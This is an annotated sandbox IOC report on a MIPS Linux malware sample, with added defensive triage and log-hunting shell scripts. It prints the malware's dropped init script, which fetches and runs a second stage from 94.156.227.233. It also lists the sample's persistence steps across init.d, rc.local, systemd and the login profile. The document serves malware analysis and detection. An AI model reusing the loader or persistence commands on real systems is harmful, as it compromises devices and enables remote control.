IOC Report
mipsel.nn.elf


Files

File Path | Type | Category | Malicious
mipsel.nn.elf | ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/mipsel.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -
/tmp/qemu-open.F3r1x3 (deleted) | ASCII text, with no line terminators | dropped | -

Notes on the Files table:

- The sandbox labels every file written during the run as "dropped", including system files that exist on any Linux host (/etc/profile, /etc/rc.local, /etc/inittab, /etc/motd) and that the sample modified rather than created. Taken together with the two init scripts, the S99 symlinks and the systemd unit (see Processes), the sample plants a start-up hook for each init style it might meet: SysV init.d/rcS.d, rc.local, inittab, systemd, and the login profile.
- Only the content of /etc/init.d/mipsel.nn.elf is recoverable from this report (it is written with an echo in the Processes table). The report does not show what was written to /etc/init.d/system, custom.service, /boot/bootcmd, /etc/inittab, /etc/motd or /etc/profile, so detection on those files has to key on the strings that are known (the download host, the sample name, the unit name) rather than on full content.
- The two "(deleted)" entries are most likely artifacts of the analysis environment rather than files the sample created: /tmp/qemu-open.* is a temporary file of qemu user-mode emulation, which is how a MIPS binary runs on an x86-64 sandbox host, and memfd:snapd-env-generator belongs to the host's systemd/snapd. Treat them as noise when building indicators.

Processes

A "-" in the Cmdline column means the sandbox recorded no command line for that process (typically a forked child that had not yet exec'd). The report flags none of these processes as malicious, so the Malicious column is omitted.

Path | Cmdline
/tmp/mipsel.nn.elf | /tmp/mipsel.nn.elf
/tmp/mipsel.nn.elf | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh | -
/usr/bin/systemctl | systemctl enable custom.service
/tmp/mipsel.nn.elf | -
/bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh | -
/usr/bin/chmod | chmod +x /etc/init.d/system
/tmp/mipsel.nn.elf | -
/bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh | -
/usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/mipsel.nn.elf | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
/tmp/mipsel.nn.elf | -
/bin/sh | sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
/bin/sh | -
/usr/bin/chmod | chmod +x /etc/init.d/mipsel.nn.elf
/tmp/mipsel.nn.elf | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh | -
/usr/bin/mkdir | mkdir -p /etc/rc.d
/tmp/mipsel.nn.elf | -
/bin/sh | sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
/bin/sh | -
/usr/bin/ln | ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
/tmp/mipsel.nn.elf | -
/tmp/mipsel.nn.elf | -
/tmp/mipsel.nn.elf | -
/tmp/mipsel.nn.elf | -
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary | -
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0

36 further processes are not shown in this excerpt.

Notes on the Processes table:

- The persistence sequence, in order: enable the custom.service unit with systemctl; make /etc/init.d/system executable and link it as /etc/rcS.d/S99system; write /etc/init.d/mipsel.nn.elf with a single echo; make it executable; create /etc/rc.d if missing; link it as /etc/rc.d/S99mipsel.nn.elf. The S99 names place both scripts last in SysV-style run-level ordering. Every command is wrapped in sh -c with output sent to /dev/null, so nothing appears on a console.
- The init script that the echo writes to /etc/init.d/mipsel.nn.elf, with the escape sequences decoded, reads:

    #!/bin/sh
    # /etc/init.d/mipsel.nn.elf

    case "$1" in
     start)
     echo 'Starting mipsel.nn.elf'
     /tmp/mipsel.nn.elf &
     wget http://94.156.227.233/ -O /tmp/lol.sh
     chmod +x /tmp/lol.sh
     /tmp/lol.sh &
     ;;
     stop)
     echo 'Stopping mipsel.nn.elf'
     killall mipsel.nn.elf
     ;;
     restart)
     $0 stop
     $0 start
     ;;
     *)
     echo "Usage: $0 {start|stop|restart}"
     exit 1
     ;;
    esac
    exit 0

  On every start it relaunches the sample from /tmp and, in addition, fetches whatever http://94.156.227.233/ serves into /tmp/lol.sh and runs it, so the second stage can be changed server-side without touching the implant. Note that the echo argument is double-quoted in the sh -c string, so $0 and $1 are expanded by the writing shell rather than by the init script, and whether the \n sequences become newlines depends on the echo implementation (dash interprets them, bash by default does not). The file on a given host may therefore differ from the decoded form above; hunt on the stable strings (the host address, /tmp/lol.sh, the sample name) rather than on the full text.
- The entries for /usr/lib/udisks2/udisksd, dumpe2fs, systemd's snapd-env-generator and gnome-session/gsd-housekeeping are background activity of the sandbox host that happened to be captured during the run; they are not children of the sample.
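The table above gives a complete list of the paths the sample touches to survive a reboot. The following POSIX shell script is an added triage example written for this page, not code from the report, the sandbox or the sample: it scans a root directory (a live / or the mount point of an evidence image) for exactly those paths, treats the ordinary system files (/etc/profile, /etc/rc.local, /etc/inittab, /etc/motd, /boot/bootcmd) as suspicious only if they contain one of the report's strings, and looks for the *.wants link that systemctl enable custom.service would normally create. That last check is an assumption, since the report does not show the unit file's [Install] section. The function names, the PERSIST_HITS variable and the scan logic are mine; the path names and IOC strings come from the tables above.

```shell
#!/bin/sh
# Added triage example for this report, not code from the sandbox or the sample.
# Checks ROOT (a live "/" or the mount point of an evidence image) for the
# persistence artifacts listed in the Files and Processes tables above.
# Path names and IOC strings come from the report; everything else is ours.

# Files the sample wrote from scratch (Files table, category "dropped").
DROPPED_PATHS="etc/init.d/mipsel.nn.elf etc/init.d/system etc/systemd/system/custom.service"

# Start-up symlinks created with ln -s (Processes table).
SYMLINK_PATHS="etc/rcS.d/S99system etc/rc.d/S99mipsel.nn.elf"

# Existing system files the report lists as modified: these are present on any
# healthy host, so flag them only when they reference one of the IOC strings.
MODIFIED_PATHS="etc/profile etc/rc.local etc/inittab etc/motd boot/bootcmd"

# Strings taken from the dropped init script and the URLs table.
IOC_PATTERNS="94.156.227.233 mipsel.nn.elf /tmp/lol.sh custom.service"

# grep_iocs FILE: succeed (exit 0) if FILE contains any IOC string.
grep_iocs() {
    for pat in $IOC_PATTERNS; do
        grep -qF -- "$pat" "$1" && return 0
    done
    return 1
}

# scan_persistence ROOT: print one "KIND path" line per finding and leave the
# number of findings in PERSIST_HITS. Always returns 0 so callers can use set -e.
scan_persistence() {
    root="${1:-/}"; root="${root%/}"   # "/" becomes "" so "$root/etc" stays valid
    PERSIST_HITS=0
    for rel in $DROPPED_PATHS; do
        p="$root/$rel"
        if [ -e "$p" ] || [ -L "$p" ]; then
            echo "DROPPED   $p"; PERSIST_HITS=$((PERSIST_HITS + 1))
        fi
    done
    for rel in $SYMLINK_PATHS; do
        p="$root/$rel"
        if [ -L "$p" ]; then       # -L first: the link target may not exist in an image
            echo "STARTLINK $p -> $(readlink "$p")"; PERSIST_HITS=$((PERSIST_HITS + 1))
        elif [ -e "$p" ]; then     # a regular file with the S99 name is just as suspicious
            echo "STARTFILE $p"; PERSIST_HITS=$((PERSIST_HITS + 1))
        fi
    done
    for rel in $MODIFIED_PATHS; do
        p="$root/$rel"
        if [ -f "$p" ] && grep_iocs "$p"; then
            echo "MODIFIED  $p"; PERSIST_HITS=$((PERSIST_HITS + 1))
        fi
    done
    # Assumption: "systemctl enable custom.service" links the unit into some
    # *.wants directory. The report does not show the unit's [Install] section,
    # so we accept any target; a unit with no [Install] would leave no link here.
    for w in "$root"/etc/systemd/system/*.wants/custom.service; do
        if [ -L "$w" ] || [ -e "$w" ]; then
            echo "ENABLED   $w"; PERSIST_HITS=$((PERSIST_HITS + 1))
        fi
    done
    return 0
}

# Usage: sh persist_check.sh ROOT   (e.g. /mnt/evidence, or / on a live host)
if [ $# -gt 0 ]; then
    scan_persistence "$1"
    echo "findings: $PERSIST_HITS"
fi
```

Prefer running it against a mounted image: on a live host the script depends on that host's sh, grep and readlink, and the same implant family that rewrites /etc/profile may have replaced those too. A clean host returns zero findings even though /etc/profile, /etc/rc.local and the rest exist, because those are only reported when they carry an IOC string.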

URLs

Name | IP | Malicious
http://94.156.227.233/curl.sh | unknown | -
http://94.156.227.233/lol.sh | unknown | -
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | unknown | -
http://94.156.227.233/ | unknown | -

Notes on the URLs table:

- The IP column reads "unknown" only because each URL already names the host by IP literal, so there was no DNS resolution to record. The report does not flag any of the URLs as malicious; in practice 94.156.227.233 is the one actionable network indicator on this page, since the dropped init script fetches http://94.156.227.233/ into /tmp/lol.sh on every start.
- The third URL is truncated in the report. Its path appears to embed local binary paths (/usr/sbin/reboot, /usr/bin/reboot, /usr/sbin/shutdown, /usr/bin/shutdown, ...) in the request; what the sample does with the response is not shown here.
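To turn the table above into a hunt across proxy or web-access logs, here is an added shell example written for this page (mine, not from the report): it flags any request to 94.156.227.233, and separately any fetch of the stage-two script names curl.sh or lol.sh from any host, because loader scripts like these are routinely re-hosted. The log lines are constructed for the example in a Squid-style access.log layout; the client addresses and the two non-IOC servers (198.51.100.7 and 203.0.113.9, RFC 5737 documentation ranges) are assumptions, and only the host 94.156.227.233 and the script paths come from the report.

```shell
#!/bin/sh
# Added hunting example for this report, not code from the sandbox or the sample.
# Flags proxy/web-access log lines that touch the download host from the URLs
# table, or that fetch one of the stage-two script names from any host.

IOC_HOST="94.156.227.233"        # download host from the URLs table
IOC_SCRIPTS="curl.sh lol.sh"     # script names served from that host

# match_network_iocs LOGFILE: print "reason | line" for each hit and leave the
# hit count in NET_HITS. Pure substring matching, so it works on any log layout
# that carries URLs or a destination IP; no field positions are assumed.
match_network_iocs() {
    NET_HITS=0
    while IFS= read -r line; do
        reason=""
        case "$line" in
            *"://$IOC_HOST"*|*" $IOC_HOST"*|*"/$IOC_HOST"*) reason="host" ;;
        esac
        for s in $IOC_SCRIPTS; do
            case "$line" in
                *"/$s"*) reason="${reason:+$reason,}stage2:$s" ;;
            esac
        done
        if [ -n "$reason" ]; then
            echo "$reason | $line"
            NET_HITS=$((NET_HITS + 1))
        fi
    done < "$1"
    return 0
}

# write_sample_log FILE: constructed Squid-style access.log lines for the demo.
# Client addresses and the two non-IOC servers (198.51.100.7, 203.0.113.9) are
# RFC 5737 documentation ranges; only 94.156.227.233 and the script paths are
# taken from the report.
write_sample_log() {
    cat > "$1" <<'EOF'
1714000001.123     45 10.0.0.12 TCP_MISS/200 812 GET http://94.156.227.233/lol.sh - HIER_DIRECT/94.156.227.233 text/plain
1714000002.456     30 10.0.0.12 TCP_MISS/200 512 GET http://198.51.100.7/index.html - HIER_DIRECT/198.51.100.7 text/html
1714000003.789     28 10.0.0.17 TCP_MISS/404 300 GET http://94.156.227.233/ - HIER_DIRECT/94.156.227.233 text/html
1714000004.000     33 10.0.0.20 TCP_MISS/200 900 GET http://203.0.113.9/curl.sh - HIER_DIRECT/203.0.113.9 text/plain
EOF
}

# Usage: sh net_hunt.sh /var/log/squid/access.log   (no argument runs the demo)
if [ $# -gt 0 ]; then
    match_network_iocs "$1"
else
    demo="${TMPDIR:-/tmp}/ioc_demo_$$.log"
    write_sample_log "$demo"
    match_network_iocs "$demo"
    rm -f "$demo"
fi
echo "hits: $NET_HITS"
```

On the constructed sample the first line is reported with reason host,stage2:lol.sh, the third with host, and the fourth with stage2:curl.sh; the request to 198.51.100.7 is left alone. The stage2 match on its own is a lead rather than a verdict, since a script called lol.sh on an unrelated host is not proof of this family; the host match is the firm indicator.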

IPs

No domain resolved for any of these addresses, and the report flags none of them as malicious, so the Malicious column is omitted.

IP | Domain | Country
16.85.46.116 | unknown | United States
141.153.175.98 | unknown | United States
102.45.249.42 | unknown | Egypt
23.140.163.253 | unknown | Reserved
44.91.16.167 | unknown | United States
140.6.22.238 | unknown | United States
121.65.228.68 | unknown | Korea Republic of
161.7.72.236 | unknown | United States
9.68.222.108 | unknown | United States
64.18.40.137 | unknown | United States
27.201.246.133 | unknown | China
61.211.208.195 | unknown | Japan
114.69.202.214 | unknown | New Caledonia
96.247.203.121 | unknown | United States
89.208.241.50 | unknown | Canada
124.73.226.217 | unknown | China
58.8.208.214 | unknown | Thailand
171.133.42.3 | unknown | United States
220.58.70.65 | unknown | Japan
185.244.20.203 | unknown | Russian Federation
88.171.194.132 | unknown | France
29.3.21.175 | unknown | United States
170.77.84.2 | unknown | United States
220.177.30.21 | unknown | China
77.169.188.118 | unknown | Netherlands
133.74.237.150 | unknown | Japan
122.7.216.72 | unknown | China
96.63.149.75 | unknown | Canada
79.10.226.150 | unknown | Italy
59.230.212.104 | unknown | China
2.247.99.27 | unknown | Germany
183.2.254.247 | unknown | China
171.103.5.185 | unknown | Thailand
143.202.251.198 | unknown | Brazil
41.66.30.165 | unknown | Côte d'Ivoire
69.195.62.189 | unknown | United States
9.36.124.206 | unknown | United States
25.67.220.192 | unknown | United Kingdom
27.101.40.27 | unknown | Korea Republic of
131.253.35.135 | unknown | United States
166.255.234.85 | unknown | United States
209.61.69.15 | unknown | United States
167.249.158.85 | unknown | Brazil
70.164.45.136 | unknown | United States
215.213.100.122 | unknown | United States
35.8.245.220 | unknown | United States
79.85.134.43 | unknown | France
184.248.244.44 | unknown | United States
178.102.72.95 | unknown | United Kingdom
170.102.237.188 | unknown | Sweden
156.120.117.127 | unknown | United States
52.123.45.58 | unknown | United States
68.96.244.104 | unknown | United States
60.147.127.121 | unknown | Japan
43.143.48.202 | unknown | Japan
201.146.234.65 | unknown | Mexico
192.24.88.99 | unknown | United States
182.132.33.187 | unknown | China
79.58.67.127 | unknown | Italy
27.88.105.142 | unknown | Japan
24.74.217.237 | unknown | United States
40.201.33.135 | unknown | United States
201.144.249.133 | unknown | Mexico
109.137.56.200 | unknown | Belgium
219.112.196.97 | unknown | Japan
40.87.51.9 | unknown | United States
138.31.144.22 | unknown | United States
91.145.155.181 | unknown | Poland
116.157.89.240 | unknown | China
73.57.116.51 | unknown | United States
170.193.12.210 | unknown | United States
86.247.50.46 | unknown | France
43.159.206.201 | unknown | Japan
120.51.142.12 | unknown | Japan
140.111.204.148 | unknown | Taiwan; Republic of China (ROC)
208.180.27.233 | unknown | United States
138.136.49.118 | unknown | United States
61.141.200.8 | unknown | China
155.0.83.58 | unknown | Zambia
145.199.85.218 | unknown | Netherlands
144.195.64.92 | unknown | United States
143.168.251.169 | unknown | United States
156.52.149.20 | unknown | Norway
131.41.46.186 | unknown | United States
163.25.54.30 | unknown | Taiwan; Republic of China (ROC)
141.89.21.61 | unknown | Germany
137.15.171.9 | unknown | Canada
30.217.220.53 | unknown | United States
49.59.36.107 | unknown | Korea Republic of
136.34.233.80 | unknown | United States
163.113.86.50 | unknown | France
124.104.96.28 | unknown | Philippines
103.199.102.178 | unknown | Hong Kong
18.254.104.182 | unknown | United States
223.23.72.115 | unknown | Taiwan; Republic of China (ROC)
97.208.174.116 | unknown | United States
42.65.62.241 | unknown | Taiwan; Republic of China (ROC)
38.143.85.198 | unknown | United States
218.57.234.215 | unknown | China
181.34.143.208 | unknown | Venezuela

90 further IPs are not shown in this excerpt.

Note: the report records these as contacted addresses without saying why they were contacted. The pattern (close to two hundred addresses spread over dozens of countries with no DNS, including ranges such as 9.0.0.0/8, 25.0.0.0/8 and 30.0.0.0/8 that rarely host anything reachable) is what outbound random-target scanning looks like, not what a command-and-control list looks like. Unless the traffic content is reviewed, treat 94.156.227.233 from the URLs table as the indicator to block and alert on, and treat this list as probable scan targets rather than infrastructure.

Memdumps

The Regiontype column is empty for every entry in the report and is omitted here. Only the first region is flagged malicious.

Base Address | Protect | Malicious
7fb6c4421000 | page execute read | malicious
7ffdc7f21000 | page execute read | -
7fb6c4462000 | page read and write | -
55aec0665000 | page execute read | -
55aec08f7000 | page read and write | -
7fb74c8cf000 | page read and write | -
7fb6c4467000 | page read and write | -
7fb74cbd9000 | page read and write | -
7fb744021000 | page read and write | -
55aec28f5000 | page execute and read and write | -
7fb74cc26000 | page read and write | -
7fb74cbe1000 | page read and write | -
7fb74b6f7000 | page read and write | -
7fb74c59e000 | page read and write | -
7fb74c1bd000 | page read and write | -
7fb74beff000 | page read and write | -
7fb74c581000 | page read and write | -
7fb74c55e000 | page read and write | -
55aec4952000 | page read and write | -
7fb744000000 | page read and write | -
55aec08ed000 | page read and write | -
7fb74cab0000 | page read and write | -
7fb74bf0d000 | page read and write | -
7ffdc7e34000 | page read and write | -
55aec290c000 | page read and write | -

15 further memdumps are not shown in this excerpt.

Note: the base addresses are 48-bit host ranges (0x55ae… PIE image, 0x7fb7… mmap, 0x7ffd… stack), which is consistent with the sample having run under qemu user-mode emulation on an x86-64 host (see /tmp/qemu-open.* in the Files table). They are addresses in the emulator process, not in the MIPS guest, so they cannot be mapped directly onto the sample's own ELF layout. The one region marked execute-read-write (55aec28f5000) is where an emulator keeps its generated code, so confirm what it contains before treating it as injected code; the region the report does flag, 7fb6c4421000, is the one to pull first.